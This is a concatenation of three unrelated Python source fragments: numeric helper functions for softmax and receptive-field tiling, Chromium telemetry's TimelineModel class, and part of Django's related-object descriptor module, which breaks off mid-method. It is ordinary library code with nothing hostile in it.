returns the limit value as T -> 0.
"""
if temp == 0 or inf in ar:
v = (ar == mmax(ar))
return v/float(sum(v))
else:
numer = Numeric.exp(ar/float(temp))
denom = Numeric.sum(numer)
return numer/denom
def normalize_minmax(ar):
"""
Return the array ar scaled so that the min value is 0 and the max
value is 1.
"""
x = ar - min(ar)
mmax = max(x)
if mmax == 0:
return x
return x/mmax
def ranseq(x):
"""
Generator that gives a random-length sequence of the integers
ascending from 0. The length is selected from the uniform
distribution over the range [0,x).
"""
for i in range(int(rand.uniform(0,x))):
yield i
def tile_rfs(vec,specs):
"""
Tile vec into several rfs, rfs are specified as a list of tuples:
(slice_start,slice_end,num_tilings,memory_size).
"""
from plastk.rl.tiles import getTiles
result = []
offset = 0
for i,(start,end,num_tilings,memory_size) in enumerate(specs):
F = getTiles(num_tilings,memory_size,vec[start:end])
result += [x + offset for x in F]
offset += memory_size
return result
def tile_uniform_rfs(vec,num_rfs,rf_width,num_tilings,memory_size):
"""
Tile vector vec into several approximately uniformly spaced
receptive fields of equal width.
num_rfs = the number of rfs
rf_width = the width of each rf
num_tilings = the number of tilings for each rf
memory_size = the memory size for each rf
Function uses place_rfs to determine rf positions.
"""
specs = [(start,end,num_tilings,memory_size)
for start,end in place_rfs(len(vec),num_rfs,rf_width)]
return tile_rfs(vec,specs)
def place_rfs(length,count,width):
"""
place-rfs - returns a list of receptive field index lists
for use as rf-indices in an rf-array
params
length = the length of the input vector
count = the number of rfs
width = the width of each rf
The rfs will be placed such that the first begins at 0 and the
last ends at length - 1. The rest will be (approximately) evenly
spaced in between. i.e. in 0..(length - width) step (length -
width)/(count - 1)
Note that they're assumed to overlap!
"""
if count==1:
return [(0,length)]
end_pos = length-width
step = int(round(end_pos / (count - 1.0)))
pos = 0
result = []
for i in range(count-1):
result.append((pos,pos+width))
pos += step
result.append((end_pos,end_pos+width))
return result
|
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''A container for timeline-based events and traces and can handle importing
raw event data from different sources. This model closely resembles that in the
trace_viewer project:
https://code.google.com/p/trace-viewer/
'''
from operator import attrgetter
import telemetry.timeline.process as tracing_process
# Register importers for data
from telemetry.timeline import bounds
from telemetry.timeline import empty_timeline_data_importer
from telemetry.timeline import inspector_importer
from telemetry.timeline import trace_event_importer
_IMPORTERS = [
empty_timeline_data_importer.EmptyTimelineDataImporter,
inspector_importer.InspectorTimelineImporter,
trace_event_importer.TraceEventTimelineImporter
]
class MarkerMismatchError(Exception):
def __init__(self):
super(MarkerMismatchError, self).__init__(
'Number or order of timeline markers does not match provided labels')
class MarkerOverlapError(Exception):
def __init__(self):
super(MarkerOverlapError, self).__init__(
'Overlapping timeline markers found')
class TimelineModel(object):
def __init__(self, timeline_data=None, shift_world_to_zero=True):
""" Initializes a TimelineModel. timeline_data can be a single TimelineData
object, a list of TimelineData objects, or None. If timeline_data is not
None, all events from it will be imported into the model. The events will
be shifted such that the first event starts at time 0, if
shift_world_to_zero is True.
"""
self._bounds = bounds.Bounds()
self._thread_time_bounds = {}
self._processes = {}
self._browser_process = None
self._frozen = False
self._tab_ids_to_renderer_threads_map = {}
self.import_errors = []
self.metadata = []
self.flow_events = []
if timeline_data is not None:
self.ImportTraces(timeline_data, shift_world_to_zero=shift_world_to_zero)
@property
def bounds(self):
return self._bounds
@property
def thread_time_bounds(self):
return self._thread_time_bounds
@property
def processes(self):
return self._processes
@property
#pylint: disable=E0202
def browser_process(self):
return self._browser_process
@browser_process.setter
#pylint: disable=E0202
def browser_process(self, browser_process):
self._browser_process = browser_process
def AddMappingFromTabIdToRendererThread(self, tab_id, renderer_thread):
if self._frozen:
raise Exception('Cannot add mapping from tab id to renderer thread once '
'trace is imported')
self._tab_ids_to_renderer_threads_map[tab_id] = renderer_thread
def ImportTraces(self, timeline_data, shift_world_to_zero=True):
if self._frozen:
raise Exception("Cannot add events once trace is imported")
importers = []
if isinstance(timeline_data, list):
for item in timeline_data:
importers.append(self._CreateImporter(item))
else:
importers.append(self._CreateImporter(timeline_data))
importers.sort(cmp=lambda x, y: x.import_priority - y.import_priority)
for importer in importers:
# TODO: catch exceptions here and add it to error list
importer.ImportEvents()
self.FinalizeImport(shift_world_to_zero, importers)
def FinalizeImport(self, shift_world_to_zero=False, importers=None):
if importers == None:
importers = []
self.UpdateBounds()
if not self.bounds.is_empty:
for process in self._processes.itervalues():
process.AutoCloseOpenSlices(self.bounds.max,
self.thread_time_bounds)
for importer in importers:
importer.FinalizeImport()
for process in self.processes.itervalues():
process.FinalizeImport()
if shift_world_to_zero:
self.ShiftWorldToZero()
self.UpdateBounds()
# Because of FinalizeImport, it would probably be a good idea
# to prevent the timeline from from being modified.
self._frozen = True
def ShiftWorldToZero(self):
self.UpdateBounds()
if self._bounds.is_empty:
return
shift_amount = self._bounds.min
for event in self.IterAllEvents():
event.start -= shift_amount
def UpdateBounds(self):
self._bounds.Reset()
for event in self.IterAllEvents():
self._bounds.AddValue(event.start)
self._bounds.AddValue(event.end)
self._thread_time_bounds = {}
for thread in self.GetAllThreads():
self._thread_time_bounds[thread] = bounds.Bounds()
for event in thread.IterEventsInThisContainer():
if event.thread_start != None:
self._thread_time_bounds[thread].AddValue(event.thread_start)
if event.thread_end != None:
self._thread_time_bounds[thread].AddValue(event.thread_end)
def GetAllContainers(self):
containers = []
def Iter(container):
containers.append(container)
for container in container.IterChildContainers():
Iter(container)
for process in self._processes.itervalues():
Iter(process)
return containers
def IterAllEvents(self):
for container in self.GetAllContainers():
for event in container.IterEventsInThisContainer():
yield event
def GetAllProcesses(self):
return self._processes.values()
def GetAllThreads(self):
threads = []
for process in self._processes.values():
threads.extend(process.threads.values())
return threads
def GetAllEvents(self):
return list(self.IterAllEvents())
def GetAllEventsOfName(self, name, only_root_events=False):
events = [e for e in self.IterAllEvents() if e.name == name]
if only_root_events:
return filter(lambda ev: ev.parent_slice == None, events)
else:
return events
def GetEventOfName(self, name, only_root_events=False,
fail_if_more_than_one=False):
events = self.GetAllEventsOfName(name, only_root_events)
if len(events) == 0:
raise Exception('No event of name "%s" found.' % name)
if fail_if_more_than_one and len(events) > 1:
raise Exception('More than one event of name "%s" found.' % name)
return events[0]
def GetOrCreateProcess(self, pid):
if pid not in self._processes:
assert not self._frozen
self._processes[pid] = tracing_process.Process(self, pid)
return self._processes[pid]
def FindTimelineMarkers(self, timeline_marker_names):
"""Find the timeline events with the given names.
If the number and order of events found does not match the names,
raise an error.
"""
# Make sure names are in a list and remove all None names
if not isinstance(timeline_marker_names, list):
timeline_marker_names = [timeline_marker_names]
names = [x for x in timeline_marker_names if x is not None]
# Gather all events that match the names and sort them.
events = []
name_set = set()
for name in names:
name_set.add(name)
for name in name_set:
events.extend(self.GetAllEventsOfName(name, True))
events.sort(key=attrgetter('start'))
# Check if the number and order of events matches the provided names,
# and that the events don't overlap.
if len(events) != len(names):
raise MarkerMismatchError()
for (i, event) in enumerate(events):
if event.name != names[i]:
raise MarkerMismatchError()
for i in xrange(0, len(events)):
for j in xrange(i+1, len(events)):
if (events[j].start < events[i].start + events[i].duration):
raise MarkerOverlapError()
return events
def GetRendererProcessFromTabId(self, tab_id):
renderer_thread = self.GetRendererThreadFromTabId(tab_id)
if renderer_thread:
return renderer_thread.parent
return None
def GetRendererThreadFromTabId(self, tab_id):
return self._tab_ids_to_renderer_threads_map.get(tab_id, None)
def _CreateImporter(self, event_data):
for importer_class in _IMPORTERS:
if importer_class.CanImport(event_data):
return importer_class(self, event_data)
raise ValueError("Could not find an importer for the provided event data")
|
|
"""
Accessors for related objects.
When a field defines a relation between two models, each model class provides
an attribute to access related instances of the other model class (unless the
reverse accessor has been disabled with related_name='+').
Accessors are implemented as descriptors in order to customize access and
assignment. This module defines the descriptor classes.
Forward accessors follow foreign keys. Reverse accessors trace them back. For
example, with the following models::
class Parent(Model):
pass
class Child(Model):
parent = ForeignKey(Parent, related_name='children')
``child.parent`` is a forward many-to-one relation. ``parent.children`` is a
reverse many-to-one relation.
There are three types of relations (many-to-one, one-to-one, and many-to-many)
and two directions (forward and reverse) for a total of six combinations.
1. Related instance on the forward side of a many-to-one or one-to-one
relation: ``ForwardManyToOneDescriptor``.
Uniqueness of foreign key values is irrelevant to accessing the related
instance, making the many-to-one and one-to-one cases identical as far as
the descriptor is concerned. The constraint is checked upstream (unicity
validation in forms) or downstream (unique indexes in the database).
If you're looking for ``ForwardOneToOneDescriptor``, use
``ForwardManyToOneDescriptor`` instead.
2. Related instance on the reverse side of a one-to-one relation:
``ReverseOneToOneDescriptor``.
One-to-one relations are asymmetrical, despite the apparent symmetry of the
name, because they're implemented in the database with a foreign key from
one table to another. As a consequence ``ReverseOneToOneDescriptor`` is
slightly different from ``ForwardManyToOneDescriptor``.
3. Related objects manager for related instances on the reverse side of a
many-to-one relation: ``ReverseManyToOneDescriptor``.
Unlike the previous two classes, this one provides access to a collection
of objects. It returns a manager rather than an instance.
4. Related objects manager for related instances on the forward or reverse
sides of a many-to-many relation: ``ManyToManyDescriptor``.
Many-to-many relations are symmetrical. The syntax of Django models
requires declaring them on one side but that's an implementation detail.
They could be declared on the other side without any change in behavior.
Therefore the forward and reverse descriptors can be the same.
If you're looking for ``ForwardManyToManyDescriptor`` or
``ReverseManyToManyDescriptor``, use ``ManyToManyDescriptor`` instead.
"""
from __future__ import unicode_literals
import warnings
from operator import attrgetter
from django.db import connections, router, transaction
from django.db.models import Q, signals
from django.db.models.query import QuerySet
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.functional import cached_property
class ForwardManyToOneDescriptor(object):
"""
Accessor to the related object on the forward side of a many-to-one or
one-to-one relation.
In the example::
class Child(Model):
parent = ForeignKey(Parent, related_name='children')
``child.parent`` is a ``ForwardManyToOneDescriptor`` instance.
"""
def __init__(self, field_with_rel):
self.field = field_with_rel
self.cache_name = self.field.get_cache_name()
@cached_property
def RelatedObjectDoesNotExist(self):
# The exception can't be created at initialization time since the
# related model might not be resolved yet; `rel.model` might still be
# a string model reference.
return type(
str('RelatedObjectDoesNotExist'),
(self.field.remote_field.model.DoesNotExist, AttributeError),
{}
)
def is_cached(self, instance):
return hasattr(instance, self.cache_name)
def get_queryset(self, **hints):
manager = self.field.remote_field.model._default_manager
# If the related manager indicates that it should be used for
# related fields, respect that.
if not getattr(manager, 'use_for_related_fields', False):
manager = self.field.remote_field.model._base_manager
return manager.db_manager(hints=hints).all()
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is None:
queryset = self.get_queryset()
queryset._add_hints(instance=instances[0])
rel_obj_attr = self.field.get_foreign_related_value
instance_attr = self.field.get_local_related_value
instances_dict = {instance_attr(inst): inst for inst in instances}
related_field = self.field.foreign_related_fields[0]
# FIXME: This will need to be revisited when we introduce support for
# composite fields. In the meantime we take this practical approach to
# solve a regression on 1.6 when the reverse manager in hidden
# (related_name ends with a '+'). Refs #21410.
# The check for len(...) == 1 is a special case that allows the query
# to be join-less and smaller. Refs #21760.
if self.field.remote_field.is_hidden() or len(self.field.foreign_related_fields) == 1:
query = {'%s__in' % related_field.name: set(instance_attr(inst)[0] for inst in instances)}
else:
query = {'%s__in' % self.field.related_query_name(): instances}
queryset = queryset.filter(**query)
# Since we're going to assign directly in the cache,
# we must manage the reverse relation cache manually.
if not self.field.remote_field.multiple:
rel_obj_cache_name = self.field.remote_field.get_cache_name()
for rel_obj in queryset:
instance = instances_dict[rel_obj_attr(rel_obj)]
setattr(rel_obj, rel_obj_cache_name, instance)
return queryset, rel_obj_attr, instance_attr, True, self.cache_name
def __get__(self, instance, cls=None):
"""
Get the related instance through the forward relation.
With the example above, when getting ``child.parent``:
- ``self`` is the descriptor managing the ``parent`` attribute
- ``instance`` is the ``child`` instance
- ``cls`` is the ``Child`` class (we don't need it)
"""
if instance is None:
return self
# The related instance is loaded from the database and then cached in
# the attribute defined in self.cache_name. It can also be pre-cached
# by the reverse accessor (ReverseOneToOneDescriptor).
try:
rel_obj = getattr(instance, self.cache_name)
except AttributeError:
val = self.field.get_local_related_value(instance)
if None in val:
rel_obj = None
else:
qs = self.get_queryset(instance=instance)
qs = qs.filter(self.field.get_reverse_related_filter(instance))
# Assuming the database enforces foreign keys, this won't fail.
rel_obj = qs.get()
# If this is a one-to-one relation, set the reverse accessor
# cache on the related object to the current instance to avoid
# an extra SQL query if it's accessed later on.
if not self.field.remote_field.multiple:
setattr(rel_obj, self.field.remote_field.get_cache_name(), instance)
setattr(instance, self.cache_name, rel_obj)
if rel_obj is None and not self.field.null:
raise self.RelatedObjectDoesNotExist(
"%s has no %s." % (self.field.model.__name__, self.field.name)
)
else:
return rel_obj
def __set__(self, instance, value):
"""
Set the related instance through the forward relation.
With the example above, when setting ``child.parent = parent``:
- ``self`` is the descriptor managing the ``parent`` attribute
- ``instance`` is the ``child`` instance
- ``value`` in the ``parent`` instance on the right of the equal sign
"""
# An object must be an instance of the related class.
if value is not None and not isinstance(value, self.field.remote_field.model._meta.concrete_model):
raise ValueError(
'Cannot assign "%r": "%s.%s" must be a "%s" instance.' % (
value,
instance._meta.object_name,
self.field.name,
self.field.remote_field.model._meta.object_name,
)
)
elif value is not None:
if instance._state.db is None:
instance._state.db = router.db_for_write(instance.__class__, instance=value)
elif value._state.db is None:
value._state.db = router.db_for_write(value.__class__, instance=instance)
elif value._state.db is not None and instance._state.db is not None:
if not router.allow_relation(value, instance):
raise ValueError('Cannot assign "%r": the current database router prevents this relation.' % value)
# If we're setting the value of a OneToOneField to None, we need to clear
# out the cache on any old related object. Otherwise, deleting the
# previously-related object will also cause this object to be deleted,
# which is wrong.
if value is None:
# Look up the previously-related object, which may still be available
# since we've not yet cleared out the related field.
# Use the cache directly, instead of the accessor; if we haven't
# populated the cache, then we don't care - we're only accessing
# the object to invalidate the accessor cache, so there's no
# need to populate the cache just to expire it again.
related = getattr(instance, self.cache_name, None)
# If we've got an old related object, we need to clear out its
# cache. This cache also might not exist if the related object
# hasn't been accessed yet.
if related is not None:
setattr(related, self.field.remote_field.get_cache_name(), None)
for lh_field, rh_field in self.field.related_fields:
setattr(instance, lh_field.attname, None)
# Set the values of the related field.
else:
for lh_field, rh_field in self.field.related_fields:
setattr(instance, lh_field.attname, getattr(value, rh_field.attname))
# Set the related instance cache used by __get__ to avoid a SQL query
# when accessing the attribute we just set.
setattr(instance, self.cache_name, value)
# If this is a one-to-one relation, set the reverse accessor cache on
# the related object to the current instance to avoid an extra SQL
# query if it's accessed later on.
if value is not None and not self.field.remote_field.multiple:
setattr(value, self.field.remote_field.get_cache_name(), instance)
class ReverseOneToOneDescriptor(object):
"""
Accessor to the related object on the reverse side of a one-to-one
relation.
In the example::
class Restaurant(Model):
place = OneToOneField(Place, related_name='restaurant')
``place.restaurant`` is a ``ReverseOneToOneDescriptor`` instance.
"""
def __init__(self, related):
self.related = related
self.cache_name = related.get_cache_name()
@cached_property
def RelatedObjectDoesNotExist(self):
# The exception isn't created at initialization time for the sake of
# consistency with `ForwardManyToOneDescriptor`.
return type(
str('RelatedObjectDoesNotExist'),
(self.related.related_model.DoesNotExist, AttributeError),
{}
)
def is_cached(self, instance):
return hasattr(instance, self.cache_name)
def get_queryset(self, **hints):
manager = self.related.related_model._default_manager
# If the related manager indicates that it should be used for
# related fields, respect that.
if not getattr(manager, 'use_for_related_fields', False):
manager = self.related.related_model._base_manager
return manager.db_manager(hints=hints).all()
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is None:
queryset = self.get_queryset()
queryset._add_hints(instance=instances[0])
rel_obj_attr = attrgetter(self.related.field.attname)
def instance_attr(obj):
return obj._get_pk_val()
instances_dict = {instance_attr(inst): inst for inst in instances}
query = {'%s__in' % self.related.field.name: instances}
queryset = queryset.filter(**query)
# Since we're going to assign directly in the cache,
# we must manage the reverse relation cache manually.
rel_obj_cache_name = self.related.field.get_cache_name()
for rel_obj in queryset:
instance = instances_dict[rel_obj_attr(rel_obj)]
setattr(rel_obj, rel_obj_cache_name, instance)
return queryset, rel_obj_attr, instance_attr, True, self.cache_name
def __get__(self, instance, cls=None):
"""
Get the related instance through the reverse relation.
With the example above, when getting ``place.restaurant``:
- ``self`` is the descriptor managing the ``restaurant`` attribute
- ``instance`` is the ``place`` instance
- ``instance_type`` in the ``Place`` class (we don't need it)
Keep in mind that ``Restaurant`` holds the foreign key to ``Place``.
"""
if instance is None:
return self
# The related instance is loaded from the database and then cached in
# the attribute defined in self.cache_name. It can also be pre-cached
# by the forward accessor (ForwardManyToOneDescriptor).
try:
rel_obj = getattr(instance, self.cache_name)
except AttributeError:
related_pk = instance._get_pk_val()
if related_pk is None:
rel_obj = None
else:
filter_args = self.related.field.get_forward_related_filter(instance)
try:
rel_obj = self.get_queryset(instance=instance).get(**filter_args)
except self.related.related_model.DoesNotExist:
rel_obj = None
else:
# Set the forward accessor cache on the related object to
# the current instance to avoid an extra SQL query if it's
# accessed later on.
setattr(rel_obj, self.related.field.get_cache_name(), instance)
setattr(instance, self.cache_name, rel_obj)
if rel_obj is None:
raise self.RelatedObjectDoesNotExist(
"%s has no %s." % (
instance.__class__.__name__,
self.related.get_accessor_name()
)
)
else:
return rel_obj
def __set__(self, instance, value):
"""
Set the related instance through the reverse relation.
With the example above, when setting ``place.restaurant = restaurant``:
- ``self`` is the descriptor managing the ``restaurant`` attribute
- ``instance`` is the ``place`` instance
- ``value`` in the ``restaurant`` instance on the right of the equal sign
Keep in mind that ``Restaurant`` holds the foreign key to ``Place``.
"""
# The similarity of the code below to the code in
# ForwardManyToOneDescriptor is annoying, but there's a bunch
# of small differences that would make a common base class convoluted.
if value is None:
# Update the cached related instance (if any) & clear the cache.
try:
rel_obj = getattr(instance, self.cache_name)
except AttributeError:
pass
else:
delattr(instance, self.cache_name)
setattr(rel_obj, self.related.field.name, None)
elif not isinstance(value, self.related.related_model):
# An object must be an instance of the related class.
raise ValueError(
'Cannot assign "%r": "%s.%s" must be a "%s" instance.' % (
value,
instance._meta.object_name,
self.related.get_accessor_name(),
self.related.related_model._meta.object_name,
)
)
else:
if instance._state.db is None:
instance._state.db = router.db_for_write(instance.__class__, instance=value)
elif value._state.db is None:
value._state.db = router.db_for_write(value.__class__, instance=instance)
elif value._state.db is not None and instance._state.db is not None:
if not router.allow_relation(value, instance):
raise ValueError('Cannot assign "%r": the current database router prevents this relation.' % value)
related_pk = tuple(getattr(instance, field.attname) for field in self.related.field.foreign_related_fields)
# Set the value of the related field to the value of the related object's related field
for index, field in enumerate(self.related.field.local_related_fields):
setattr(value, field.attname, related_pk[index])
# Set the related instance cache used by __get__ to avoid a SQL query
# when accessing the attribute we just set.
setattr(instance, self.cache_name, value)
# Set the forward accessor cache on the related object to the current
# instance to avoid an extra SQL query if it's accessed later on.
setattr(value, self.related.field.get_cache_name(), instance)
class ReverseManyToOneDescriptor(object):
"""
Accessor to the related objects manager on the reverse side of a
many-to-one relation.
In the example::
class Child(Model):
parent = ForeignKey(Parent, related_name='children')
``parent.children`` is a ``ReverseManyToOneDescriptor`` instance.
Most of the implementation is delegated to a dynamically defined manager
class built by ``create_forward_many_to_many_manager()`` defined below.
"""
def __init__(self, rel):
self.rel = rel
self.field = rel.field
@cached_property
def related_manager_cls(self):
return create_reverse_many_to_one_manager(
self.rel.related_model._default_manager.__class__,
self.rel,
)
def __get__(self, instance, cls=None):
"""
Get the related objects through the reverse relation.
With the example above, when getting ``parent.children``:
- ``self`` is the descriptor managing the ``children`` attribute
- ``instance`` is the ``parent`` instance
- ``instance_type`` in the ``Parent`` class (we don't need it)
"""
if instance is None:
return self
return self.related_manager_cls(instance)
def __set__(self, instance, value):
"""
Set the related objects through the reverse relation.
With the example above, when setting ``parent.children = children``:
- ``self`` is the descriptor managing the ``children`` attribute
- ``instance`` is the ``parent`` instance
- ``value`` in the ``children`` sequence on the right of the equal sign
"""
warnings.warn(
'Direct assignment to the reverse side of a related set is '
'deprecated due to the implicit save() that happens. Use %s.set() '
'instead.' % self.rel.get_accessor_name(), RemovedInDjango20Warning, stacklevel=2,
)
manager = self.__get__(instance)
manager.set(value)
def create_reverse_many_to_one_manager(superclass, rel):
"""
Create a manager for the reverse side of a many-to-one relation.
This manager subclasses another manager, generally the default manager of
the related model, and adds behaviors specific to many-to-one relations.
"""
class RelatedManager(superclass):
def __init__(self, instance):
super(RelatedManager, self).__init__()
self.instance = instance
self.model = rel.related_model
self.field = rel.field
self.core_filters = {self.field.name: instance}
def __call__(self, **kwargs):
# We use **kwargs rather than a kwarg argument to enforce the
# `manager='manager_name'` syntax.
manager = getattr(self.model, kwargs.pop('manager'))
manager_class = create_reverse_many_to_one_manager(manager.__class__, rel)
return manager_class(self.instance)
do_not_call_in_templates = True
def get_queryset(self):
try:
return self.instance._prefetched_objects_cache[self.field.related_query_name()]
except (AttributeError, KeyError):
db = self._db or router.db_for_read(self.model, instance=self.instance)
empty_strings_as_null = connections[db].features.interprets_empty_strings_as_nulls
qs = super(RelatedManager, self).get_queryset()
qs._add_hints(instance=self.instance)
if self._db:
qs = qs.using(self._db)
qs = qs.filter(**self.core_filters)
for field in self.field.foreign_related_fields:
val = getattr(self.instance, field.attname)
if val is None or (val == '' and empty_strings_as_null):
return qs.none()
qs._known_related_objects = {self.field: {self.instance.pk: self.instance}}
return qs
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is None:
queryset = super(RelatedManager, self).get_queryset()
queryset._add_hints(instance=instances[0])
queryset = queryset.using(queryset._db or self._db)
rel_obj_attr = self.field.get_local_related_value
instance_attr = self.field.get_foreign_related_value
instances_dict = {instance_attr(inst): inst for inst in instances}
query = {'%s__in' % self.field.name: instances}
queryset = queryset.filter(**query)
# Since we just bypassed this class' get_queryset(), we must manage
# the reverse relation manually.
for rel_obj in queryset:
instance = instances_dict[rel_obj_attr(rel_obj)]
setattr(rel_obj, self.field.name, instance)
cache_name = self.field.related_query_name()
return queryset, rel_obj_attr, instance_attr, False, cache_name
def add(self, *objs, **kwargs):
bulk = kwargs.pop('bulk', True)
objs = list(objs)
db = router.db_for_write(self.model, instance=self.instance)
def check_and_update_obj(obj):
if not isinstance(obj, self.model):
raise TypeError("'%s' instance expected, got %r" % (
self.model._meta.object_name, obj,
))
setattr(obj, self.field.name, self.instance)
if bulk:
pks = []
for obj in objs:
check_and_update_obj(obj)
if obj._state.adding or obj._state.db != db:
raise ValueError(
"%r instance isn't saved. Use bulk=False or save "
"the object first." % obj
)
pks.append(obj.pk)
self.model._base_manager.using(db).filter(pk__in=pks).update(**{
self.field.name: self.instance,
})
else:
with transaction.atomic(using=db, savepoint=False):
for obj in objs:
check_and_update_obj(obj)
obj.save()
add.alters_data = True
def create(self, **kwargs):
kwargs[self.field.name] = self.instance
db = router.db_for_write(self.model, instance=self.instance)
return super(RelatedManager, self.db_manager(db)).create(**kwargs)
create.alters_data = True
def get_or_create(self, **kwargs):
kwargs[self.field.name] = self.instance
db = router.db_for_write(self.model, instance=self.instance)
return super(RelatedManager, self.db_manager(db)).get_or_create(**kwargs)
get_or_create.alters_data = True
def update_or_create(self, **kwargs):
kwargs[self.field.name] = self.instance
db = router.db_for_write(self.model, instance=self.instance)
return super(RelatedManager, self.db_manager(db)).update_or_create(**kwargs)
update_or_create.alters_data = True
# remove() and clear() are only provided if the ForeignKey can have a value of null.
if rel.field.null:
def remove(self, *objs, **kwargs):
if not objs:
return
bulk = kwargs.pop('bulk', True)
val = self.field.get_foreign_related_value(self.instance)
old_ids = set()
for obj in objs:
# Is obj actually part of this descriptor set?
if self.field.get_local_related_value(obj) == val:
old_ids.add(obj.pk)
else:
raise self.field.remote_field.model.DoesNotExist(
"%r is not related to %r." % (obj, self.instance)
)
self._clear(self.filter(pk__in=old_ids), bulk)
remove.alters_data = True
def clear(self, **kwargs):
bulk = kwargs.pop('bulk', True)
self._clear(self, bulk)
clear.alters_data = True
def _clear(self, queryset, bulk):
db = router.db_for_write(self.model, instance=self.instance)
queryset = queryset.using(db)
if bulk:
# `QuerySet.update()` is intrinsically atomic.
queryset.update(**{self.field.name: None})
else:
with transaction.atomic(using=db, savepoint=False):
for obj in queryset:
setattr(obj, self.field.name, None)
obj.save(update_fields=[self.field.name])
_clear.alters_data = True
def set(self, objs, **kwargs):
# Force evaluation of `objs` in case it's a queryset whose value
# could be affected by `manager.clear()`. Refs #19816.
objs = tuple(objs)
bulk = kwargs.pop('bulk', True)
clear = kwargs.pop('clear', False)
if self.field.null:
db = router.db_for_write(self.model, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
if clear:
self.clear()
self.add(*objs, bulk=bulk)
else:
old_objs = set(self.using(db).all())
new_objs = []
for obj in objs:
if obj in old_objs:
old_objs.remove(obj)
else:
new_objs.append(obj)
self.remove(*old_objs, bulk=bulk)
self.add(*new_objs, bulk=bulk)
else:
self.add(*objs, bulk=bulk)
set.alters_data = True
return RelatedManager
class ManyToManyDescriptor(ReverseManyToOneDescriptor):
"""
Accessor to the related objects manager on the forward and reverse sides of
a many-to-many relation.
In the example::
class Pizza(Model):
toppings = ManyToManyField(Topping, related_name='pizzas')
``pizza.toppings`` and ``topping.pizzas`` are ``ManyToManyDescriptor``
instances.
Most of the implementation is delegated to a dynamically defined manager
class built by ``create_forward_many_to_many_manager()`` defined below.
"""
def __init__(self, rel, reverse=False):
super(ManyToManyDescriptor, self).__init__(rel)
self.reverse = reverse
@property
def through(self):
# through is provided so that you have easy access to the through
# model (Book.authors.through) for inlines, etc. This is done as
# a property to ensure that the fully resolved value is returned.
return self.rel.through
@cached_property
def related_manager_cls(self):
model = self.rel.related_model if self.reverse else self.rel.model
return create_forward_many_to_many_manager(
model._default_manager.__class__,
self.rel,
reverse=self.reverse,
)
def create_forward_many_to_many_manager(superclass, rel, reverse):
"""
Create a manager for the either side of a many-to-many relation.
This manager subclasses another manager, generally the default manager of
the related model, and adds behaviors specific to many-to-many relations.
"""
class ManyRelatedManager(superclass):
def __init__(self, instance=None):
super(ManyRelatedManager, self).__init__()
self.instance = instance
if not reverse:
self.model = rel.model
self.query_field_name = rel.field.related_query_name()
self.prefetch_cache_name = rel.field.name
self.source_field_name = rel.field.m2m_field_name()
self.target_field_name = rel.field.m2m_reverse_field_name()
self.symmetrical = rel.symmetrical
else:
self.model = rel.related_model
self.query_field_name = rel.field.name
self.prefetch_cache_name = rel.field.related_query_name()
self.source_field_name = rel.field.m2m_reverse_field_name()
self.target_field_name = rel.field.m2m_field_name()
self.symmetrical = False
self.through = rel.through
self.reverse = reverse
self.source_field = self.through._meta.get_field(self.source_field_name)
self.target_field = self.through._meta.get_field(self.target_field_name)
self.core_filters = {}
for lh_field, rh_field in self.source_field.related_fields:
core_filter_key = '%s__%s' % (self.query_field_name, rh_field.name)
self.core_filters[core_filter_key] = getattr(instance, rh_field.attname)
self.related_val = self.source_field.get_foreign_related_value(instance)
if None in self.related_val:
raise ValueError('"%r" needs to have a value for field "%s" before '
'this many-to-many relationship can be used.' %
(instance, self.source_field_name))
# Even if this relation is not to pk, we require still pk value.
# The wish is that the instance has been already saved to DB,
# although having a pk value isn't a guarantee of that.
if instance.pk is None:
raise ValueError("%r instance needs to have a primary key value before "
"a many-to-many relationship can be used." %
instance.__class__.__name__)
def __call__(self, **kwargs):
# We use **kwargs rather than a kwarg argument to enforce the
# `manager='manager_name'` syntax.
manager = getattr(self.model, kwargs.pop('manager'))
manager_class = create_forward_many_to_many_manager(manager.__class__, rel, reverse)
return manager_class(instance=self.instance)
do_not_call_in_templates = True
def _build_remove_filters(self, removed_vals):
filters = Q(**{self.source_field_name: self.related_val})
# No need to add a subquery condition if removed_vals is a QuerySet without
# filters.
removed_vals_filters = (not isinstance(removed_vals, QuerySet) or
removed_vals._has_filters())
if removed_vals_filters:
filters &= Q(**{'%s__in' % self.target_field_name: removed_vals})
if self.symmetrical:
symmetrical_filters = Q(**{self.target_field_name: self.related_val})
if removed_vals_filters:
symmetrical_filters &= Q(
**{'%s__in' % self.source_field_name: removed_vals})
filters |= symmetrical_filters
return filters
def get_queryset(self):
try:
return self.instance._prefetched_objects_cache[self.prefetch_cache_name]
except (AttributeError, KeyError):
qs = super(ManyRelatedManager, self).get_queryset()
qs._add_hints(instance=self.instance)
if self._db:
qs = qs.using(self._db)
return qs._next_is_sticky().filter(**self.core_filters)
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is None:
queryset = super(ManyRelatedManager, self).get_queryset()
queryset._add_hints(instance=instances[0])
queryset = queryset.using(queryset._db or self._db)
query = {'%s__in' % self.query_field_name: instances}
queryset = queryset._next_is_sticky().filter(**query)
# M2M: need to annotate the query in order to get the primary model
# that the secondary model was actually related to. We know that
# there will already be a join on the join table, so we can just add
# the select.
# For non-autocreated 'through' models, can't assume we are
# dealing with PK values.
fk = self.through._meta.get_field(self.source_field_name)
join_table = self.through._meta.db_table
connection = connections[queryset.db]
qn = connection.ops.quote_name
queryset = queryset.extra(select={
'_prefetch_related_val_%s' % f.attname:
'%s.%s' % (qn(join_table), qn(f.column)) for f in fk.local_related_fields})
return (
queryset,
lambda result: tuple(
getattr(result, '_prefetch_related_val_%s' % f.attname)
for f in fk.local_related_fields
),
lambda inst: tuple(
f.get_db_prep_value(getattr(inst, f.attname), connection)
for f in fk.foreign_related_fields
),
False,
self.prefetch_cache_name,
)
def add(self, *objs):
if not rel.through._meta.auto_created:
opts = self.through._meta
raise AttributeError(
"Cannot use add() on a ManyToManyField which specifies an "
"intermediary model. Use %s.%s's Manager instead." %
(opts.app_label, opts.object_name)
)
db = router.db_for_write(self.through, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
self._add_items(self.source_field_name, self.target_field_name, *objs)
# If this is a symmetrical m2m relation to self, add the mirror entry in the m2m table
if self.symmetrical:
self._add_items(self.target_field_name, self.source_field_name, *objs)
